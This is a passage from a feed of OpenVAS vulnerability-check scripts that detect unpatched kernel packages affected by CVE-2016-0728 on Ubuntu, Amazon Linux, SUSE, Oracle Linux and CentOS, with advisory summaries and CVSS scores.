isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310842612", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842612", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2870-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-trusty USN-2870-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842612\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:49 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2870-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count when\n joining an existing session keyring. A local attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code with\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2870-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2870-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-76-generic\", ver:\"3.13.0-76.120~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-76-generic-lpae\", ver:\"3.13.0-76.120~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:55:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310120632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120632", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-642)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120632\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 07:22:48 +0200 (Wed, 20 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-642)\");\n script_tag(name:\"insight\", value:\"Perception Point Research identified a use-after-free vulnerability, representing a local privilege escalation vulnerability in the Linux kernel. Their post contains a detailed analysis of the bug.kernel-4.1.13-19.30.amzn1 and earlier versions are impacted.\");\n script_tag(name:\"solution\", value:\"Run yum clean all followed by yum update kernel to update your system. You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-642.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-01-23T00:00:00", "id": "OPENVAS:1361412562310851161", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851161", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851161\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-23 06:12:30 +0100 (Sat, 23 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\n The following security bug was fixed:\n\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0205-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Oracle Linux Local Security Checks ELSA-2016-0064", "modified": "2019-03-14T00:00:00", "published": "2016-01-26T00:00:00", "id": "OPENVAS:1361412562310122858", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122858", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0064", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122858\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-26 10:12:45 +0200 (Tue, 26 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0064\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0064 - kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0064.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310842610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842610", "type": "openvas", "title": "Ubuntu Update for linux-lts-utopic USN-2873-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-utopic USN-2873-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842610\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:47 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-utopic USN-2873-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-utopic'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-utopic on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2873-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2873-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic-lpae\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-lowlatency\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-e500mc\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-emb\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 